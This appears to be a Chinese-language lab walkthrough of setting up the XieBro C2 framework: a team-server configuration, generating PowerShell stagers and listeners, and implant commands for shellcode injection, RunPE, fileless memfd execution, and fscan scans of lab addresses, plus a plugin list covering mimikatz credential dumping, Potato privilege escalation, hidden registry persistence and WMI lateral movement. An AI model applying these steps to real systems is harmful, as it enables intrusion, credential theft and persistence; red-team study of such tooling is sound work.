linxu 部署服务端./TeamServer64,-g profile.json 生成一个新文件
{
"Banner": "3.2",
"Host": "10.211.55.4",
"wsPort": "8880",
"Password": "123456",
"Accouts": [ "admin", "User", "super" ],
"StagerPort": "4050",
"Telegram_Token": "",
"Telegram_chat_ID": "",
"Fork": true,
"Route": "www",
"AesKey": "QWERt_CSDMAHUATW",
"Process64": "C:\\windows\\system32\\notepad.exe",
"Process86": "C:\\Windows\\SysWOW64\\notepad.exe",
"WebServers": [],
"listeners": [],
"proxys": [],
"rdiShellcode32": "",
"rdiShellcode64": "0xE8,0x00,0x00"
重点修改Host、Password、AesKey。而后启动。
Xf9KpL2QzR4wNmH8
XieBroC2 客户端就可以成功连接。客户端仅支持windows,每次启用连接都需要手动确认一次密码和key,否则服务端会出现错误。

image.png
webscript 用来生成powershell 代码

image.png
创建监听器

image.png
amd64 ,目标 Windows 或 Linux 服务器,绝大多数情况是 amd64。
arm64,其他
在点击生成以后,文件在服务端

image.png
上线以后help可查看命令帮助

image.png
nps,在内存中执行powershell命令
Inline-assembly,加载.net程序集时无需进程
execute-assembly,跨进程加载.net程序集,属于传统方式容易被检测
Inline-Execute,在当前会话的进程空间内直接加载并执行 PE 文件
Runpe,跨进程加载PE,包括C/C++/Go/Rust编写的程序
RunShellcode, C:\Windows\beacon.bin 加载第三方shellcode
bin-injection, 注入shellcode到指定进程
memfd root\home\fscan -h 192.168.1.1/24 linux下无文件内存执行
下载https://github.com/INotGreen/Xiebro-Plugins 插件以后可直接使用。
fscan无法使用,还会导致服务端报错 Unhandled exception. System.Exception: Failed to read loader ,经过改良以后fscan还没有加载出来,木马过量占用cpu,测试其他命令正常
| 工具 | 描述 |
|---|---|
| mimikatz | 从内存中提取明文密码、哈希、PIN 码和 Kerberos 票证 |
| RegHide | 添加隐藏注册表启动项 |
| SharpKatz | mimikatz的C#版本,用于获取明文密码和dcsync |
| SharpScan | 内网资产收集、探测主机存活、端口扫描、域控定位、文件搜索、密码爆破和账号枚举 |
| SharpToken | Token窃取,切换System和administrator权限,用于提权降权场景 |
| SweetPotato | 将服务器权限提升至System权限 |
| SharpWMI | 基于135端口的横向移动工具,可以执行命令,上传文件 |
| BadPotato | 将服务器权限提升至System权限 |
| GodPotato | 将服务器权限提升至System权限 |
inline-execute E:\secure\c2\tools\fscan.exe -h 10.211.55.3 -o C:\Windows\Temp\result.txt
可以成功
Inline-Execute-Bin E:\secure\c2\tools\fscan.bin -h 10.211.55.3 -o C:\Windows\Temp\result.txt
适用于没有参数的shellcode
RunPE E:\secure\c2\tools\fscan.exe -h 10.211.55.3 -o C:\Windows\Temp\result.txt
测试也不成功,不知道是不是我方法有问题。
颜色变红,为下线状态。

image.png